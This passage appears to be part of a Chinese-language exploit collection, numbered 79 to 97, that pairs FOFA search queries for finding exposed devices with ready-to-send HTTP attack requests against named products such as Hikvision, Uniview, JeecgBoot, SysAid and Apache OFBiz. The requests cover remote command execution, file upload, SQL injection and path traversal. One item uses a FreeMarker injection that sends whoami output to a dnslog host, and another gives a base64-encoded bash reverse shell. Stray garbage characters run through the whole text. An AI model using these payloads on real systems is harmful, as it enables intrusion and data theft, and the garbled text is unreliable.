& q6 v( H& f4 S4 ~* x5 x5 X! Z, {Content-Length: 3360 k* `, J5 p% g
Accept-Encoding: gzip
0 G# }# o( W6 k- T: v( B( CContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l- b4 V4 b1 |6 @$ Y. z+ U
( h# p& \9 ^' \) L6 X. ~  |1 _( ^! Y
------YsOxWxSvj1KyZow1PTsh98fdu6l# }* i) e# ~1 `0 v0 _) a- R3 p
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
  f; Q) o; H' N6 AContent-Type: image/png
# g" w9 m; h+ E5 V5 _0 \+ b" t5 ~$ G) |8 O8 t
YsOxWxSvj1KyZow1PTsh98fdu6l
. H% ~/ C! @& J7 Y+ L------YsOxWxSvj1KyZow1PTsh98fdu6l6 T% X0 I% o# B& S* q2 Y- Y
Content-Disposition: form-data; name="target"
* o2 w7 |/ ]8 H* [; s8 D- w+ x7 S- g4 I: V- ^7 u+ l9 ~. n$ W4 N
/Applications/SkillDevelopAndEHS/
' u6 M0 _* \7 f4 k3 L8 O------YsOxWxSvj1KyZow1PTsh98fdu6l--- ?$ ]6 A, ?% `: N

/ O+ R& F) u: Z, ~
8 K: X! ^  h( ~$ OGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
2 R' B: G! U) n* QHost: x.x.x.x
* C" m% N% h+ A0 O0 }9 w; }6 c- A

# C' W9 Z6 Z) y/ o' T8 z6 D8 U4 |3 S79. BYTEVALUE 百为流控路由器远程命令执行, H! j) C# f% i+ t$ _( e
FOFA:BYTEVALUE 智能流控路由器
$ M5 @% {  i5 z9 a$ M  YGET /goform/webRead/open/?path=|id HTTP/1.1" c( A$ a& b" H3 _, d
Host:IP
* C9 [/ x3 W  h: EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
3 u6 e) S1 e9 O7 m' d5 lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; q, E7 s5 T& o/ F2 B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; w9 @% N& a+ m# HAccept-Encoding: gzip, deflate7 n: s+ \( V8 B% x
Connection: close
% h- N3 ?" N$ x% s+ m" \% \Upgrade-Insecure-Requests: 1
' C/ I$ N; h4 H0 P% L. U/ o& V! j1 G! y8 @" m- |, Q  F
" f7 O( a' o  Y0 ~! o# ?0 j
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 r) m. s7 ]% W5 W% @, j
FOFA:app="速达软件-公司产品"
5 V" G6 d& _& D: T2 \! zPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
) }3 c! W$ ]4 x1 y- Q! X4 U$ O+ Y' YHost: x.x.x.x
) B/ X/ {: P) D& t1 g8 v: r# OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 y$ A% ]9 {$ V2 s' e& {
Content-Length: 277 ~( i5 Q$ C& A$ Q" B# K' v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- H6 a' v& f# q) PAccept-Encoding: gzip, deflate
& N! u7 M) U! C2 \$ zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) W( @9 N# k8 c# ?( K# {: u
Connection: close/ i7 b# }+ N* E5 @/ g
Content-Type: application/octet-stream/ R& T+ a: B0 h3 x, g% ?
Upgrade-Insecure-Requests: 1  G0 e- `9 t. k' g" s4 u2 {# P

& Z* B$ {: y/ ?8 R7 i4 [<% out.print("oessqeonylzaf");%>
+ w1 }4 q+ H3 x) H
) U5 D1 @7 K5 w6 C2 `9 s8 k/ ?5 \
& Y8 u" d: t' S; }5 W+ tGET /xykqmfxpoas.jsp HTTP/1.12 B! J2 ^9 m5 y5 _# q2 ^
Host: x.x.x.x6 F/ v) R0 g& L8 c4 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* h* Q7 F; i$ Q" GConnection: close8 C- h% j1 ]( t" R( V1 Q
Accept-Encoding: gzip$ C, j) u. W7 ~) ?  J7 T: A

  e1 F; |1 u. p) O6 A! e3 F9 U) u* @: F$ s0 x- X3 S. R
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露1 O8 ?7 Z* |5 j# N. ?* p
FOFA:app="uniview-视频监控"
1 ~$ }' @  I, }0 fGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.16 g2 R* e# A/ Y# y* }
Host: x.x.x.x
* e) B' d( r. VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ U$ s8 y! a  t2 SConnection: close5 k5 d0 q' ^. k1 ?0 j9 U9 z& a
Accept-Encoding: gzip% f( L( }1 f# H! `2 Y

# d* W9 x1 [+ y9 |# U( l% v2 R+ @8 O8 d/ p, {2 D& T  G7 L6 w
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行* w, _: X# `0 e& |# Q: n' A
FOFA:app="思福迪-LOGBASE"8 ]6 k$ g3 v$ M( g# B" y& B& Q
POST /bhost/test_qrcode_b HTTP/1.1% W9 l/ ^! t3 r7 \) G7 M
Host: BaseURL/ m7 g  h  {( ^& r& |
User-Agent: Go-http-client/1.1
- h5 _  r; u: z' `' R( q7 GContent-Length: 23% s0 A, |' ^8 H: u. [2 M7 T
Accept-Encoding: gzip$ W+ M0 a' ?. L
Connection: close
3 j4 v" m: S$ l3 ^* `& r9 O2 oContent-Type: application/x-www-form-urlencoded
# }! C1 f+ S1 q' T9 |, E& u& ZReferer: BaseURL
8 W; D( Q& M; j, g0 _5 t& Z
7 d6 s& l+ \5 ?8 y; F2 `0 [z1=1&z2="|id;"&z3=bhost% W- \$ h2 h3 H5 d; u

8 e/ K1 c4 g* n6 P7 E4 C/ ?4 C; F" n1 k* _2 X( [/ k
83. JeecgBoot testConnection 远程命令执行, ]# i$ V' `9 V2 j' _. r
FOFA:title=="JeecgBoot 企业级低代码平台"/ {) A/ e! ^! ^) r
6 V7 Q$ O7 [0 ?! F2 t3 c
8 o) |  E( ]/ U( p4 Q
POST /jmreport/testConnection HTTP/1.1
  X- u1 g8 I& i5 S' [Host: x.x.x.x
" h3 `1 q6 [& Y+ FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 G( a1 \4 l3 e, ]: o
Connection: close
2 \0 ^$ |; X$ zContent-Length: 8881) p, K9 H6 _( ^1 \' ]) o0 |
Accept-Encoding: gzip- q' Z: w, Z" N- s) w- E  _
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"2 J9 r6 A1 B" u' n2 F. s, k9 [% f
Content-Type: application/json4 F* |- A- R( v

$ ?  \/ e( Z/ uPAYLOAD7 k7 a" ~; w5 t' ^0 F* b
' @0 @, D( W5 @# ^
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' \, L- g( a5 l  z. q* j' u  k* uFOFA:title=="JeecgBoot 企业级低代码平台"
& T2 P/ d' {( t3 ^& x9 |' S- J% i; m7 j

& k- [" @7 P' N& h& X, B0 M# c. l' k# g- F3 J
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
' s( l- J# l4 _; h8 g; D1 W9 tHost: 192.168.40.130:8080; L/ i3 S6 ]$ \/ w: @' Q
User-Agent: curl/7.88.15 m* j' K- ~  m  {6 _0 q
Content-Length: 156
% d- p) P* o' |# E+ E' }  zAccept: */*: q3 t) G8 @) \' O
Connection: close3 L$ I* b+ @3 ^, M
Content-Type: application/json" z  H, y; T, }
Accept-Encoding: gzip& p; O! T0 e9 P5 O' N

6 t. i7 F" U- S. l' a4 U{0 y! _" n: F: y! @% W- }, [* R4 w
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
; f2 u$ a: ]: @3 c/ ^  "type": "0"0 r1 ?( C6 _- [# P! ]# c$ H$ ]  R- V, m6 K
}
; s0 S4 G# k9 V2 ]) Y; t3 r; r( M' {0 m/ Y" s# k- |# W% R
" t) M! L- L# J3 a
85. SysAid On-premise< 23.3.36远程代码执行* K; E0 V# E- c  ~
CVE-2023-472462 [% O  M8 w; W& g2 L
FOFA:body="sysaid-logo-dark-green.png" ! U) y# _3 h. ~) G; C( _4 Z3 f
EXP数据包如下,注入哥斯拉马7 s6 c4 k7 p9 P$ t. D
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.15 q0 o. a& H) G3 |5 Z
Host: x.x.x.x  V1 G" \, J7 x: ^8 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 }. B: Q4 j! _7 D2 k
Content-Type: application/octet-stream( j& n; i2 ~0 O. i1 n" ]/ v
Accept-Encoding: gzip
" p) b3 \" |) ^- P) T$ u% d* Q* L8 Q1 P4 M% _3 U& u
PAYLOAD; |% a+ }7 T; s, i

. B1 x6 U& [8 e  Q! ]9 D回显URL:http://x.x.x.x/userfiles/index.jsp$ J8 h" C0 z9 }- t8 k+ C  X' L/ k- O
0 J, D" t2 Z5 q! Z3 f0 e, ?
86. 日本tosei自助洗衣机RCE) M" V0 {" g* `3 {/ L& c
FOFA:body="tosei_login_check.php"
/ |7 g; C+ N1 Y1 {9 @! @POST /cgi-bin/network_test.php HTTP/1.1; G6 C$ u, [1 P1 B+ I/ s8 V- y# d! Y
Host: x.x.x.x/ d, M7 X! e( L/ {
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) T$ A/ g2 v6 l, w3 c
Connection: close
8 ], n) k; ?4 xContent-Length: 44
( @  u3 s- v6 c. V7 W+ p& CAccept: */*
0 D8 x9 L: u3 d# ^Accept-Encoding: gzip
* d; l: I# N/ L0 W9 z% RAccept-Language: en
  T5 _% q0 z' ?1 x: e6 NContent-Type: application/x-www-form-urlencoded
: ^4 D( I; O6 N
1 E8 n5 f6 P& `' p5 p8 J/ \) Rhost=%0acat${IFS}/etc/passwd%0a&command=ping- G7 T& v6 I  s/ ~4 t0 W

, [' y; X7 L& g2 p3 P& `
* G6 J! x# ~- R$ V" \6 m87. 安恒明御安全网关aaa_local_web_preview文件上传9 S9 G! o! [9 y8 c
FOFA:title="明御安全网关"3 D' I7 g$ Q  h3 H/ U
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
* c2 H9 a; L$ s# S: JHost: X.X.X.X; y1 W; s, `. I" i6 h4 y. _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; K. S+ t- O0 F& v
Connection: close
4 @, \/ P$ K( h/ }1 V. p# f0 cContent-Length: 198
9 ?$ H' _0 l  t$ i4 lAccept-Encoding: gzip$ ]; w/ F! e+ |+ {0 o+ s
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd0 Z4 G# L1 ~3 _$ k6 t% A- s
" J+ S. Z! A" \: U( h) ~
--qqobiandqgawlxodfiisporjwravxtvd) y" r3 {, C* k( K* b# K) L
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
7 v4 A7 k; w* [" F- u: I4 C1 _# J# WContent-Type: text/plain
1 r  ^. U) Q" `( y( m$ I3 |
% H9 L- M  g4 |, c1 s2 y# D# h2ZqGNnsjzzU2GBBPyd8AIA7QlDq* H8 `) k: O* L8 q# |" U  L. ]
--qqobiandqgawlxodfiisporjwravxtvd--, U8 f. A  t1 U. v* w$ Z) c  k: ^
! Q0 W! P  i+ k1 [8 s# @6 Q0 p
0 M$ @4 U6 a! p- z5 ~: P
/jfhatuwe.php
4 v) @7 b% O) d7 p  ?
5 W& X6 m9 V6 B2 ?3 S$ C88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行2 m2 z  h$ ^( D. @  D& c2 P$ w! \
FOFA:title="明御安全网关"
; x0 A& C$ ^+ |5 h1 iGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
: z. M1 X/ m, _Host: x.x.x.xx.x.x.x6 L$ Z5 h, U7 R& D* p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 |% \! k5 X; OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% k3 k+ c. d, M1 W5 q+ p% |' x
Accept-Encoding: gzip, deflate
) [/ u+ `! P1 ^  m" A! {6 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; p3 T7 P5 f$ N+ S5 F; j9 D# gConnection: close
6 i8 g1 i$ A- a7 ]% ^1 K
" g+ y9 z* I4 n3 e6 g' n" T0 H! ?0 h* g1 N! W/ ^$ V1 A# x
/astdfkhl.php
/ c$ g7 l5 w  x4 q. ?8 o+ k# [6 l  J/ i7 V+ d- ?; ]& J
89. 致远互联FE协作办公平台editflow_manager存在sql注入& F$ i; O, w( p: x
FOFA:title="FE协作办公平台" || body="li_plugins_download"  t' T5 k$ m1 f' E# ^
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
+ S( r$ O- X# a% ?9 SHost: x.x.x.x) w2 O5 W- j) p. Z/ [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* S! r" c, `8 u+ O( sConnection: close
1 _& N$ j4 q. ]2 p' s6 FContent-Length: 41
8 ]+ R! p* d+ L+ M: k5 @Content-Type: application/x-www-form-urlencoded' r  g/ I4 _1 l7 r9 K' I
Accept-Encoding: gzip5 K2 [! d; O- T3 A+ a

2 ^9 P" ]3 K% N! _option=2&GUID=-1'+union+select+111*222--+, Y- r/ h6 s* J$ A$ M' @7 a4 w
& {- t8 i+ g/ Z9 ]7 {
! g% \5 C$ _. S- P6 Z( e
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行5 |6 G: b0 S0 Y9 @5 a1 O' A
FOFA:icon_hash="-1830859634"
: e* t  a; ?8 z& L  V3 W$ kPOST /php/ping.php HTTP/1.1
3 e0 i* n) f# gHost: x.x.x.x
9 t# A) C; d9 W* S) G; ~! g+ B- `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
$ g& A. y. G) O; z7 S9 qContent-Length: 51
6 w! W, B  Y  L4 R: kAccept: application/json, text/javascript, */*; q=0.01
, q3 e5 h; V) t' H, i! iAccept-Encoding: gzip, deflate
4 J6 Y! F: n: }3 x' j( ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 }" L. w. C' _
Connection: close8 y* x& W3 g7 l! _) C( k
Content-Type: application/x-www-form-urlencoded7 c" h8 ^; y' O5 A. ~( P
X-Requested-With: XMLHttpRequest
) Z; k7 V( _* e, d6 ]
* C" x1 v3 d  bjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig* J; S. m% e9 q5 ?1 \
9 L. h2 J. Q" e2 s# ?. V" B# [0 F

& m2 E) U* }+ E( i91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
, T/ f  T6 ~- }8 S8 aFOFA:title="综合安防管理平台"
6 L& ^, K6 x; k* G2 n0 B, tGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1% z0 P7 p% D+ x2 L) e8 o
Host: your-ip
$ u9 [9 l7 Z; e7 }/ I( F- UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
) h4 K; `' l) f+ m. PAccept-Encoding: gzip, deflate4 x# ~  Q0 I$ U. e" W
Accept: */*, I, ]7 A" n* {$ i! L9 ?5 b( q
Connection: keep-alive
/ r8 V! \  w" O, b
3 y; L, K1 C  [5 V
) O9 F0 t( j  K6 W2 m# q1 q8 k3 ]( e+ M7 R3 @) |* t" _
92. 海康威视运行管理中心session命令执行3 k% B/ X; T1 @5 d" |6 n
Fastjson命令执行
4 K6 E/ i- q7 z5 [' m- ahunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
$ p8 Q3 P% h! t( h! SPOST /center/api/session HTTP/1.1
: W9 Y3 W* \5 M$ o5 Q* JHost:
" }9 r1 P+ D" a3 l2 ^1 YAccept: application/json, text/plain, */*
# O1 k5 j( G* l6 `' WAccept-Encoding: gzip, deflate
1 [& m( e& U% b& pX-Requested-With: XMLHttpRequest4 t1 J. J3 {7 |; D# j# c
Content-Type: application/json;charset=UTF-8# h& x4 ]' J1 U
X-Language-Type: zh_CN6 y3 r0 g; }; ~+ K7 o1 V
Testcmd: echo test
' W. i& j4 Z: C( ^/ }: e+ s) _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36, `! b3 v2 `. r  F: C2 E* U
Accept-Language: zh-CN,zh;q=0.9+ r% U+ D- I" l2 y7 o
Content-Length: 5778
" d9 ?+ }2 ~3 k& A8 c
' ?/ Y5 A% S4 [PAYLOAD  l" ]+ I; ?- [% i: @3 r

  D* W) Y8 `' S
2 s+ M5 D) N' b4 B( a+ b) ~5 E93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传- H8 i: r8 G/ X
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="; w& M' V1 Q0 A0 r. @
POST /?g=app_av_import_save HTTP/1.1  D% B1 V2 M2 ]; A" E
Host: x.x.x.x8 ]" k& B8 u  T$ }1 R/ V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx; Z" ~) O% e, b& z& }  r& N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" h# D( H5 U+ s5 @' A
2 |3 e, w7 v0 [7 }1 o# n
------WebKitFormBoundarykcbkgdfx
' m0 p+ ^$ M4 b3 `8 A# S" fContent-Disposition: form-data; name="MAX_FILE_SIZE"4 i5 l& P3 f& N. k- |( X3 ^& f' K

5 E# L6 U# D* G' V' T$ }# C10000000& Z- _/ [2 V+ X/ K  n6 R
------WebKitFormBoundarykcbkgdfx( v5 R8 M5 V; `* s' t: R) ]2 I
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
- U& U) O& q4 I2 _! Y* `6 Q$ d, IContent-Type: text/plain7 Z( L, U  ^7 y" r$ P$ d6 k* g

6 \7 \7 @' E3 S' m7 B3 j; K9 Nwagletqrkwrddkthtulxsqrphulnknxa3 i" f- n5 i; }, Q2 ?& T. c4 i
------WebKitFormBoundarykcbkgdfx
. x! W% U5 _! ]; ~, kContent-Disposition: form-data; name="submit_post"
" |; d7 u, j0 ^9 C  a, ~- ^8 g+ k+ }, ~' J1 O+ X- c6 E- M
obj_app_upfile
" A. I: q# Y( j3 U  K" j* o------WebKitFormBoundarykcbkgdfx. M7 s3 P* e- W1 w8 `& U& Y
Content-Disposition: form-data; name="__hash__"% A/ S  L- l1 I# E2 x$ N5 l: ]! g
2 Z. u5 s7 f7 ]6 f9 s
0b9d6b1ab7479ab69d9f71b05e0e9445
- x# o7 I% f% r( }------WebKitFormBoundarykcbkgdfx--
' G5 P; ^5 N0 O
" N7 O$ {0 X3 {( R
- k/ q8 K3 a, d0 b, Y7 NGET /attachements/xlskxknxa.txt HTTP/1.1
# h" l8 G5 }; a* d& a, ^8 t3 U6 [Host: xx.xx.xx.xx
1 l+ ^: O- `7 [0 rUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
* p$ U* S+ ~8 L  e) x8 t. p$ A2 S2 D" s' f! }: y
, X" l  w, I7 c- ^5 i
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传- G, Z. Y/ T/ Q$ m) ~; Y3 s
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 t: S7 g, a3 B1 |
POST /?g=obj_area_import_save HTTP/1.1) a; K$ l, j$ Z; q. w
Host: x.x.x.x
! ^# u0 O: d: |3 ~7 hContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt. E1 g0 f1 V3 c4 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: h1 a+ c. s/ d3 N5 `$ x/ p+ A
7 H  x, I* O+ Y/ \& c  W3 x$ ?
------WebKitFormBoundarybqvzqvmt6 j% P1 d4 c/ e* W/ J5 P' i
Content-Disposition: form-data; name="MAX_FILE_SIZE", [3 o) Y7 n0 Q+ \5 A+ T
6 v) ], Z+ Z+ s/ A: H4 y
10000000! c* V% _6 D4 _
------WebKitFormBoundarybqvzqvmt5 |. h6 t" N  h  k  D* C9 K- D
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"- {# v; `# R$ S' q4 ?) ~
Content-Type: text/plain
* M) }2 u" F- r2 f. a5 j7 C% P4 H8 F6 h3 B) i8 t) J9 K
pxplitttsrjnyoafavcajwkvhxindhmu
, N$ \5 i" S& n. o------WebKitFormBoundarybqvzqvmt
& N/ X* r7 H, a& jContent-Disposition: form-data; name="submit_post"
0 y5 q8 C' U5 ?- A* f
$ E+ g3 c! o3 O  d  M, Y5 Y7 l0 N. qobj_app_upfile
1 z1 q" ^* Q+ Y" X( X- k------WebKitFormBoundarybqvzqvmt
; }& s" E. T- ~; [5 TContent-Disposition: form-data; name="__hash__"; U0 A+ T2 e6 R6 C+ R8 \
2 m9 A! i/ O( ]; z! T
0b9d6b1ab7479ab69d9f71b05e0e9445
4 X: I% o6 v: o% m; Y  d% e0 T------WebKitFormBoundarybqvzqvmt--
3 Q+ K8 B, f) A+ D; |; B$ R5 ]$ w/ A# B

/ [2 ]1 ?0 W6 f8 n) D4 b' K
8 G! J: p2 q7 Q& V. ^, `GET /attachements/xlskxknxa.txt HTTP/1.12 d5 ~5 s# [  c: h- D" N! O
Host: xx.xx.xx.xx* ~% P# y' y# T. C) Q% k$ f* q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 j* u, v7 a% s3 h0 |1 @" }
  ?- u  s  d: K8 N7 `* b5 f( A& s' J. q& @  J) o+ D1 M
( A+ Y: i# {: `( a+ I
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行) q% K% u' k- X% _. o# s- W$ Q1 v
CVE-2023-49070
9 g7 x  H0 _+ `% U0 M/ YFOFA:app="Apache_OFBiz"
$ j1 K3 v7 c( u2 ^0 |. N& gPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1$ s  U& l) Y/ o# T
Host: x.x.x.x; e0 L6 G1 k" D# b% S* ~- h+ o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36! G% q( u, ?5 l+ U: B! x4 b' c$ v
Connection: close, N5 p' w! P' U6 Q) \5 o0 W3 ^
Content-Length: 889
% i; y) j) n# }' w" JContent-Type: application/xml
) @+ y3 s" [) }+ `$ E1 r& J: `% EAccept-Encoding: gzip: n" ]5 @- Y3 _0 T+ o( F0 M
7 g$ k0 h9 \/ p9 ~, U( `
<?xml version="1.0"?>
& E2 O3 W# s, d% [6 X3 w; l<methodCall>
/ E6 p0 |, s- w# j" h- g" q4 Z   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>" ]+ s7 ^. d* u) m
    <params>  z0 G0 S/ i; {7 G! j
      <param>
% ~4 t% T0 \" ]+ z/ r) E: y  y      <value>
$ c7 _9 p8 I) g        <struct>
6 w: }! B: f2 e" w) ^       <member>: i6 V# w, B1 ^2 q4 V5 z1 R
          <name>test</name>- [" _' ^. e$ e  t
          <value>
9 }/ g& `, b# w1 {5 c3 `8 b8 m      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
0 o0 [% n+ ]. \          </value>1 [4 d' s, T3 c( F$ B
        </member>; P" i1 r2 s: @2 C1 \. k# }
      </struct>9 A% f5 K4 z/ P, O" v& D. Z
      </value># Z" |' O1 n. T' q* n
    </param>
4 Q/ e5 T8 v; z    </params>" Q5 H# V, m9 E' B
</methodCall>
3 s4 _5 y: `, `0 J8 j( D  W: l
) L* o/ B1 \: p; V+ n' y7 I+ d# {& }
用ysoserial生成payload: H) B6 d* A2 a, t
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"6 o6 d9 N. l( D: ~: O

: w# q& w7 Y4 I" @6 b8 U, r- E/ E6 M! c* D, U+ A# G
将生成的payload替换到上面的POC7 }# H  N9 Y7 d! S$ l- _# ?# Z
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.14 S9 L4 X" m7 a1 r- |& F7 w  X5 X: ?+ R
Host: 192.168.40.130:8443
  `* q- i/ }5 p' O/ aUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 X4 p" O! t6 J: U8 z* v7 mConnection: close) A3 J4 n) u4 Z( F: I) w
Content-Length: 889
, o4 k0 r& W0 C9 I  _: hContent-Type: application/xml
' E8 M' w  _$ ?4 nAccept-Encoding: gzip- M1 q9 S$ O& l- O0 `

3 w/ A: U  U) b- J# pPAYLOAD
8 p+ _, L4 r" E2 X! t8 I0 ?4 x5 C  J' `1 s2 B! L
96. Apache OFBiz  18.12.11 groovy 远程代码执行
8 ]  |  J7 R; x1 L  }: OFOFA:app="Apache_OFBiz"* c8 N- p3 S2 {8 M
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1( p9 A, L( D7 V4 u" \, ^* m9 z; F
Host: localhost:8443
& B3 r; f  L+ s7 _& ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# r( u, w. ]1 [7 i% P% WAccept: */*
$ z* N- [% B% s" a% z7 `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 ~! D& D/ J( ]2 \5 q+ E4 L3 f. S/ JContent-Type: application/x-www-form-urlencoded
4 M$ R% P* A6 \# E2 J, UContent-Length: 55
' f/ l1 I8 c  j3 ^
7 C, [0 }$ P: `' |# _7 l: a% mgroovyProgram=throw+new+Exception('id'.execute().text);
" u6 \& `! i: l+ J" x  V+ m, u7 I6 X6 \& S1 N: X4 B% o
+ L) |# w& M: Y+ C5 A
反弹shell/ W1 y- X0 G) u! H8 G
在kali上启动一个监听
" w0 F- m5 W: Z( g1 bnc -lvp 7777
3 r8 W1 V) g" V8 `
. `% I$ j7 c, ^3 Y$ ]4 |6 Z2 ^5 w' b3 SPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
# [! M; ^$ R: T( m3 e% I' ~Host: 192.168.40.130:84437 m& ?9 h0 e  v) x5 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- F6 n6 O% z7 {, p! I& A" x
Accept: */*
& _: p) z7 _7 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" \5 q* }( o4 Q. R" ~: D) u5 h0 i
Content-Type: application/x-www-form-urlencoded
. \# s$ a" z5 B2 w1 OContent-Length: 71/ W4 n) V7 _/ A/ H3 P  E0 {9 n% u
( l0 n$ y- m# O$ A: n1 t: G+ K
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();* R6 E. i4 P- S# h4 ?1 V2 t
( p$ t& l0 m5 K. J9 [
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
; z* s$ ]# V6 `6 P) y# uFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
